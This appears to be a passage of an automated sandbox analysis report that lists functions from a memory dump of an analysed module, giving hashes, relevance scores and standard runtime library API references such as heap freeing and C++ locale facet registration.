Instruction ID: 75019a6c6965533f8467b34cda28c3bd6eeacaef6440296edf7e4a85fdb1b704
Opcode Fuzzy Hash: 54114cdd00808bfa1e4ad4d19ebf83486203911e90a795f74954c7ed4388e79c
Instruction Fuzzy Hash: C9510336A11217ABEB158E64CC40EBB7BA9EB56754F21462EFD0CD7280EB35DC40C6B0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BECF9, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 187COMMON

Download Yara Rule

APIs

Part of subcall function 6D4C1817: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6D4C1849

_free.LIBCMT ref: 6D4BEE04
_free.LIBCMT ref: 6D4BEE1B
_free.LIBCMT ref: 6D4BEE3A
_free.LIBCMT ref: 6D4BEE55
_free.LIBCMT ref: 6D4BEE6C

Strings

=R-, xrefs: 6D4BEE9D
DnPm, xrefs: 6D4BEDDE

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$AllocateHeap
String ID: =R-$DnPm
API String ID: 3033488037-3466048270
Opcode ID: a10aa1d19e859c581cb0e343fb6fa6c850f48d114b6c3c819f7d8e5cdf5a56e0
Instruction ID: 840883cf38a15c5203f375ba5df4977e8554e6b8ab4b1da75fd05d0cba5d0c8f
Opcode Fuzzy Hash: a10aa1d19e859c581cb0e343fb6fa6c850f48d114b6c3c819f7d8e5cdf5a56e0
Instruction Fuzzy Hash: 1551B175A04305AFEB11CF69C880F6A77F4EF99724F2145ADEA09DB250E731DE418BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C6222, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

=R-, xrefs: 6D4C622A

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID:
String ID: =R-
API String ID: 0-526339512
Opcode ID: cd63963b42c2707cf47d777c01cc036530413bb1ee24246ab2dcb1eaea942323
Instruction ID: 59c9bfc6b0aa7a6701e9cf71c177da828ed1b7120ff8ddd4112a157fef5c3bf3
Opcode Fuzzy Hash: cd63963b42c2707cf47d777c01cc036530413bb1ee24246ab2dcb1eaea942323
Instruction Fuzzy Hash: 9871BF399042179BDB21CF59C844FBFBB75EF45314F258229E96467260DB708C42CBEA

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C8A45, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6D508120), ref: 6D4C8AAF
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540A64,000000FF,00000000,0000003F,00000000,?,?), ref: 6D4C8B27
WideCharToMultiByte.KERNEL32(00000000,00000000,6D540AB8,000000FF,?,0000003F,00000000,?), ref: 6D4C8B54
_free.LIBCMT ref: 6D4C8A9D

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(?,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?,?), ref: 6D4C02F6

_free.LIBCMT ref: 6D4C8C69

Strings

=R-, xrefs: 6D4C8BAB

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID: =R-
API String ID: 1286116820-526339512
Opcode ID: 3a3f3d8f6a6a2c51f939c22875e575ad35381ad612fe2ee06a9c6d488356bf73
Instruction ID: 2b89349fec85de3f5a443b8285afcf0bb47ee99fe55d698883624f822fbcaf51
Opcode Fuzzy Hash: 3a3f3d8f6a6a2c51f939c22875e575ad35381ad612fe2ee06a9c6d488356bf73
Instruction Fuzzy Hash: 4151EBB9904209AFDF10DF6ACC84D7E77B8EF45314B22426FE56497690E7309E41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CCA10, Relevance: 10.6, APIs: 7, Instructions: 65COMMON

Download Yara Rule

APIs

Part of subcall function 6D4CC6F6: _free.LIBCMT ref: 6D4CC71F

_free.LIBCMT ref: 6D4CCA5E

Part of subcall function 6D4C02CE: HeapFree.KERNEL32(00000000,00000000,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?), ref: 6D4C02E4
Part of subcall function 6D4C02CE: GetLastError.KERNEL32(?,?,6D4CC724,?,00000000,?,00000000,?,6D4CCA29,?,00000007,?,?,6D4CBDC8,?,?), ref: 6D4C02F6

_free.LIBCMT ref: 6D4CCA69
_free.LIBCMT ref: 6D4CCA74
_free.LIBCMT ref: 6D4CCAC8
_free.LIBCMT ref: 6D4CCAD3
_free.LIBCMT ref: 6D4CCADE
_free.LIBCMT ref: 6D4CCAE9

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 9d7fa3d03ade73cbe32b9155f84779464575b1a55af6e10987faf18e024615a8
Instruction ID: 05dd7c52da67924be9ad83aaee827d802a456890a2019beb5be96e66a56c2e14
Opcode Fuzzy Hash: 9d7fa3d03ade73cbe32b9155f84779464575b1a55af6e10987faf18e024615a8
Instruction Fuzzy Hash: 4511AC79A49B08AAEA20EBB0CD05FCB779EAF00304F45081CB7A9B6050CB64FC4086C2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4B526F, Relevance: 9.2, APIs: 6, Instructions: 200COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 6D4B529B
__cftoe.LIBCMT ref: 6D4B52CD

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: c8924ee84c743fd3fa5024435cee531011904a63d8dee87bc3e64307ee3ef695
Instruction ID: 77aa08f2837dde20e0125cb36e60d72b669232d6ba81a54a10bc59d693d25092
Opcode Fuzzy Hash: c8924ee84c743fd3fa5024435cee531011904a63d8dee87bc3e64307ee3ef695
Instruction Fuzzy Hash: F951F436908206ABDB148B69DC40FBEB7B8AF59364F61421DE924A6391DB71CD00CAB4

Uniqueness

Uniqueness Score: -1.00%

Function 6D4BDE57, Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,6D4B42CA,?,?,6D47A5FA,?,6D460074,=R-,?,?,?,6D4FC880,000000FF), ref: 6D4BDE5B
_free.LIBCMT ref: 6D4BDE8E
_free.LIBCMT ref: 6D4BDEB6
SetLastError.KERNEL32(00000000), ref: 6D4BDEC3
SetLastError.KERNEL32(00000000), ref: 6D4BDECF
_abort.LIBCMT ref: 6D4BDED5

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: e1390838b764a5236f3fc8d54c623925e1e83075214bcca5f555afb06658cb94
Instruction ID: 5379e335cb7943bf93024828e80a1b306c7192e2a0354b798b4b247f66b3b47a
Opcode Fuzzy Hash: e1390838b764a5236f3fc8d54c623925e1e83075214bcca5f555afb06658cb94
Instruction Fuzzy Hash: 0BF0F43D508E0126DB0256399D08F2B26769FF67AAF37415DF61A92680EF398C0280B2

Uniqueness

Uniqueness Score: -1.00%

Function 6D479011, Relevance: 9.0, APIs: 6, Instructions: 33COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D47901D
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47902B

Part of subcall function 6D4924F4: RaiseException.KERNEL32(?,?,?,6D4915E0,6D55AA10,6D55AA10,6D55AA10,?,?,?,?,?,6D4915E0,6D528C7C,6D531C84), ref: 6D492554

std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D47903D
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47904B
std::invalid_argument::invalid_argument.LIBCONCRT ref: 6D47905D
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47906B

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: Exception@8Throwstd::invalid_argument::invalid_argument$ExceptionRaise
String ID:
API String ID: 2590316965-0
Opcode ID: 24b84a920771dbfe7581a91776ea1be60bf48a8b59ad12318e642cec34d55335
Instruction ID: e853d611abc77f117fb1495fa93b2d0f8dfa1243752263ca532ed9fdda3aa22b
Opcode Fuzzy Hash: 24b84a920771dbfe7581a91776ea1be60bf48a8b59ad12318e642cec34d55335
Instruction Fuzzy Hash: ADF01275C0424C77CF18EAF6D895CDDBB7CAA04104F814465AB10A6451EF71AB1DD7D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C2A87, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 186COMMON

Download Yara Rule

Strings

=R-, xrefs: 6D4C2A8F
L<Km, xrefs: 6D4C2B86

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID:
String ID: =R-$L<Km
API String ID: 0-3442322085
Opcode ID: 59e0ecba0fd12e18b684743089c37dd0f249ff1982f4c4212aa115e2565e32dd
Instruction ID: 527e53a791ee1cc964f81fa84e191f59de085f45ab9be425f9c54236223fa4f7
Opcode Fuzzy Hash: 59e0ecba0fd12e18b684743089c37dd0f249ff1982f4c4212aa115e2565e32dd
Instruction Fuzzy Hash: 8651B879D5820A9FDF21CFA9C884FAE7BB4BF16314F115149E514A7250DFB09D01CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C3F56, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000000,4D8A1055,?,00000000,00000000,?,?,?,?,00000001,?,4D8A1055,00000001,?,?), ref: 6D4C3FA3
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 6D4C402C
GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6D4B60DF), ref: 6D4C403E
__freea.LIBCMT ref: 6D4C4047

Part of subcall function 6D4C1817: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 6D4C1849

Strings

=R-, xrefs: 6D4C3F5E

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__freea
String ID: =R-
API String ID: 2652629310-526339512
Opcode ID: 757e17827b2c4fe956b09aba4731e399595842ec85f8af8b708d8ff172e33a3f
Instruction ID: 05e0e09f78537c155c125e2a50027fdf50212e625966caf5ab1ab347b1616247
Opcode Fuzzy Hash: 757e17827b2c4fe956b09aba4731e399595842ec85f8af8b708d8ff172e33a3f
Instruction Fuzzy Hash: B7319D36A0020AABDF25CF66DC84EAE3BA5EB45254F114229EC18DB250E739DD51CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CF76, Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CF87
std::_Facet_Register.LIBCPMT ref: 6D48CFD8
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CFF8
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48D016
_Mpunct.LIBCPMT ref: 6D48D049

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_MpunctRegisterThrow
String ID:
API String ID: 3611545457-0
Opcode ID: 948f3da73a5ab42383b73c139177c820eff39986b3a303f6891319c26d79f19f
Instruction ID: 3cda77f413a03b387522f7995ad9991772a050b0cafb8a2872b8494a2c626318
Opcode Fuzzy Hash: 948f3da73a5ab42383b73c139177c820eff39986b3a303f6891319c26d79f19f
Instruction Fuzzy Hash: 6121A93180425A9BCF05CFA5C840EEEBBB1AF84354F22440EEA14AB391DF70DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D481118, Relevance: 7.6, APIs: 5, Instructions: 71COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D481129
std::_Facet_Register.LIBCPMT ref: 6D48117A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48119A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4811B8
_Mpunct.LIBCPMT ref: 6D4811EB

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_MpunctRegisterThrow
String ID:
API String ID: 3611545457-0
Opcode ID: 2f87456b5d8d9912f162e3722e84bf38f9d2a59eff42c43dfa5ab054bd23b402
Instruction ID: 6420f1ee8e18ce224156004517cb5ab3ff3272c5042cc890e9c317a93406412b
Opcode Fuzzy Hash: 2f87456b5d8d9912f162e3722e84bf38f9d2a59eff42c43dfa5ab054bd23b402
Instruction Fuzzy Hash: B521BA758042199BCF15CFA4C840EEE7BB5AF89354F26040EEA24AB390DB70DE01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47911C, Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D47912D
codecvt.LIBCPMT ref: 6D479167
std::_Facet_Register.LIBCPMT ref: 6D47917E
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47919E
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4791BC

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowcodecvt
String ID:
API String ID: 324574759-0
Opcode ID: e99a8c89a8b5d2748eb17b2589cfae55cd0fce491789b0c762a94121f1c97e7b
Instruction ID: 645d249a41a9631d72cb5606b3d4857c1438540ce97310e87ab6846c44051db3
Opcode Fuzzy Hash: e99a8c89a8b5d2748eb17b2589cfae55cd0fce491789b0c762a94121f1c97e7b
Instruction Fuzzy Hash: D021C3729082299BCF14DF95C854EEE7779AF85764F22040DE601AB390DF759E01C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47727A, Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D47728B
codecvt.LIBCPMT ref: 6D4772C5
std::_Facet_Register.LIBCPMT ref: 6D4772DC
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4772FC
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47731A

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowcodecvt
String ID:
API String ID: 324574759-0
Opcode ID: 5407325410a7a527bf1b44f60293f70f5ff5af0137a4e750f4a0b886aa52380e
Instruction ID: 0bd3d47f7ed6ddeda4de81d8ae610c9b0d9d70409925519696c9f92bf887b630
Opcode Fuzzy Hash: 5407325410a7a527bf1b44f60293f70f5ff5af0137a4e750f4a0b886aa52380e
Instruction Fuzzy Hash: FE21CFB1D082299BCF14DB95C850EEE77B5AF44214F22000EEA10AB390DF709E01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D47BB3E, Relevance: 7.6, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D47BB4F
numpunct.LIBCPMT ref: 6D47BB89
std::_Facet_Register.LIBCPMT ref: 6D47BBA0
std::_Lockit::~_Lockit.LIBCPMT ref: 6D47BBC0
__CxxThrowException@8.LIBVCRUNTIME ref: 6D47BBDE

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrownumpunct
String ID:
API String ID: 2501072427-0
Opcode ID: 1669d27aa2d8d7e715dbed35b4c2a0372379070c545e277fd7b3e86135e4e02e
Instruction ID: 8a6d1a5ecbb88621c7914215708fd4d5eb66293510f8b4186be49610b3d9ba94
Opcode Fuzzy Hash: 1669d27aa2d8d7e715dbed35b4c2a0372379070c545e277fd7b3e86135e4e02e
Instruction Fuzzy Hash: 4D11CA319042199BCF18CF64D844EEE7BB4BF85328F22441DEA14AB390DB74DE058BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48056C, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48057D
ctype.LIBCPMT ref: 6D4805B7
std::_Facet_Register.LIBCPMT ref: 6D4805CE
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4805EE
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48060C

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowctype
String ID:
API String ID: 1081823724-0
Opcode ID: c432740e7ce3ecffa8e7ce5014ea25b1d965276609fedf095828eba3bdba230c
Instruction ID: f48b6790a781b0bfba114ec4271584c4cf2c65701337db8361fc1e01497c0246
Opcode Fuzzy Hash: c432740e7ce3ecffa8e7ce5014ea25b1d965276609fedf095828eba3bdba230c
Instruction Fuzzy Hash: 5211AC72C042298BCF05DBA5C990EEE7775AF84364F26040DD611AB390EF34EE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CD84, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CD95
moneypunct.LIBCPMT ref: 6D48CDCF
std::_Facet_Register.LIBCPMT ref: 6D48CDE6
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CE06
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CE24

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: 169dedf51f5d0f82ac054f09c8c6978058cf34377111132661ad34b0c4d6ee92
Instruction ID: 6a4a3e08ded4054197777a8f02cf788b8b00b9d1e14d8a505385b4a4c52c1c2b
Opcode Fuzzy Hash: 169dedf51f5d0f82ac054f09c8c6978058cf34377111132661ad34b0c4d6ee92
Instruction Fuzzy Hash: 2C119A328042299BCF14DBA5C840EFE7B75AF85364F26050DD610AB391DF74EE418BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480420, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480431
collate.LIBCPMT ref: 6D48046B
std::_Facet_Register.LIBCPMT ref: 6D480482
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4804A2
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4804C0

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowcollate
String ID:
API String ID: 86117490-0
Opcode ID: f346fb75506384176464aeb08b68611dbc3830018fd22625057d3dde33f21c6e
Instruction ID: bf2ccf3a0551a2146f17593b45fa2422438b2e61c61384e3bafa3a5d254fb74a
Opcode Fuzzy Hash: f346fb75506384176464aeb08b68611dbc3830018fd22625057d3dde33f21c6e
Instruction Fuzzy Hash: 3D11EC329042299BCF15DFA1C880EEE7775AF80764F26040DD611BB2A0DF30DE418BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4804C6, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D4804D7
collate.LIBCPMT ref: 6D480511
std::_Facet_Register.LIBCPMT ref: 6D480528
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480548
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480566

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowcollate
String ID:
API String ID: 86117490-0
Opcode ID: 39fe53d9a84223e915662a0862e69953a3564060f2a54ccd8ffd2a021565f28b
Instruction ID: 35853d34022c736bc9adaa1874975f74d622de95834dace82747b579904015f4
Opcode Fuzzy Hash: 39fe53d9a84223e915662a0862e69953a3564060f2a54ccd8ffd2a021565f28b
Instruction Fuzzy Hash: 3D11AC728046299BCF05DFA5C884EEE7775AF84368F26040DD614AB290DF34EE058BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480612, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480623
messages.LIBCPMT ref: 6D48065D
std::_Facet_Register.LIBCPMT ref: 6D480674
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480694
__CxxThrowException@8.LIBVCRUNTIME ref: 6D4806B2

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmessages
String ID:
API String ID: 447356255-0
Opcode ID: 3d333e042352d5b1308f0ef8bf65b45a651cd0ee9679d2fa82f1a104f3f4c2a1
Instruction ID: bf55b2ccaeb9bde9b5476912c0cd11da5956d0c329e2bdaf73b2ad1eeb8fe921
Opcode Fuzzy Hash: 3d333e042352d5b1308f0ef8bf65b45a651cd0ee9679d2fa82f1a104f3f4c2a1
Instruction Fuzzy Hash: 7A11A0328042199BCF05DB65C844EEE7775AF84354F2A040DD616BB390DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48CE2A, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48CE3B
moneypunct.LIBCPMT ref: 6D48CE75
std::_Facet_Register.LIBCPMT ref: 6D48CE8C
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48CEAC
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48CECA

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: 91452b926b02fe09204edfdb5baaebb95c3a019fc8e1e817282bd6f99ccbc297
Instruction ID: 673cb1e2456a296a382d523126225180c3ec358f0679807872fd1924a273018d
Opcode Fuzzy Hash: 91452b926b02fe09204edfdb5baaebb95c3a019fc8e1e817282bd6f99ccbc297
Instruction Fuzzy Hash: C3119A729042298BCF14DBA5C840EFE77B5AF84754F26010ED610AB391DF74EE419BD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480E80, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480E91
numpunct.LIBCPMT ref: 6D480ECB
std::_Facet_Register.LIBCPMT ref: 6D480EE2
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480F02
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480F20

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrownumpunct
String ID:
API String ID: 2501072427-0
Opcode ID: 3a234ae8d2625f3f6814d5e645d248dcb61e3a9983c5675b96d625a783e90026
Instruction ID: 9df684e113dfa27f0677b02a0ec607c5ea61fd674d176d0d83a8b29f93d3b353
Opcode Fuzzy Hash: 3a234ae8d2625f3f6814d5e645d248dcb61e3a9983c5675b96d625a783e90026
Instruction Fuzzy Hash: 0611A0329042199BCF15DF65C844EFE7775AF85354F26041DD6116B290DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4806B8, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D4806C9
messages.LIBCPMT ref: 6D480703
std::_Facet_Register.LIBCPMT ref: 6D48071A
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48073A
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480758

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmessages
String ID:
API String ID: 447356255-0
Opcode ID: 78ac1076fa26bf45fafe6df12a1640ed719bd07d585b3a9411fbb709b65a5d4b
Instruction ID: 36659fa113f989637416a9e81e08acb4ad8f06632a8f18e2a956507b894c6d8f
Opcode Fuzzy Hash: 78ac1076fa26bf45fafe6df12a1640ed719bd07d585b3a9411fbb709b65a5d4b
Instruction Fuzzy Hash: CB119A329042698BCF15DBA5C884EEE7775AF84768F26041ED611AB290DF34DE01CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4809F6, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480A07
moneypunct.LIBCPMT ref: 6D480A41
std::_Facet_Register.LIBCPMT ref: 6D480A58
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480A78
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480A96

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: 3b7713bc617e64bcf42d1043b4f4f8b5a55bf65e6e5abccc8bf604e617f56a8f
Instruction ID: b21035272712467243b7f4e3958dcc3923e8df0d1bd56202bde803e3550932e6
Opcode Fuzzy Hash: 3b7713bc617e64bcf42d1043b4f4f8b5a55bf65e6e5abccc8bf604e617f56a8f
Instruction Fuzzy Hash: C011AC328041299BCF15DFA6C840EEE77B5AF84358F26440DD610AB291DF74EE028BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480B42, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D480B53
moneypunct.LIBCPMT ref: 6D480B8D
std::_Facet_Register.LIBCPMT ref: 6D480BA4
std::_Lockit::~_Lockit.LIBCPMT ref: 6D480BC4
__CxxThrowException@8.LIBVCRUNTIME ref: 6D480BE2

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowmoneypunct
String ID:
API String ID: 158860062-0
Opcode ID: b22674adcddd4f7ca0ee1961414124575ca3a12ea92b250425039b3bdff5b0c2
Instruction ID: dcc723c190bfc79ed722ede56f5d2dfb2289a093371cb7d3842c33cdab91b612
Opcode Fuzzy Hash: b22674adcddd4f7ca0ee1961414124575ca3a12ea92b250425039b3bdff5b0c2
Instruction Fuzzy Hash: F2119A728041698BCF15DBA5C884EEE7775AF85368F26080DE611BB2A0DF74DE018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D48037A, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6D48038B
codecvt.LIBCPMT ref: 6D4803C5
std::_Facet_Register.LIBCPMT ref: 6D4803DC
std::_Lockit::~_Lockit.LIBCPMT ref: 6D4803FC
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48041A

Memory Dump Source

Source File: 00000005.00000002.909878965.000000006D460000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: false

Similarity

API ID: std::_$Lockit$Exception@8Facet_Lockit::_Lockit::~_RegisterThrowcodecvt
String ID:
API String ID: 324574759-0
Opcode ID: 647b72f24ef8154aad12e132a8b52c56a68bd27abf08c229c282e7846524e63f
Instruction ID: 2f258415c9a8f746fcb9e5d6df13fc1a86bb0639220ee111e2f22b56d37eb188
Opcode Fuzzy Hash: 647b72f24ef8154aad12e132a8b52c56a68bd27abf08c229c282e7846524e63f
Instruction Fuzzy Hash: D511AC7290422A8BCF14DBA6C890EEE7775AF85764F26040DD610AB391DF74DE418BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6D480BE8, Relevance: 7.6, APIs: 5, Instructions: 54COMMON

Download Yara Rule

APIs

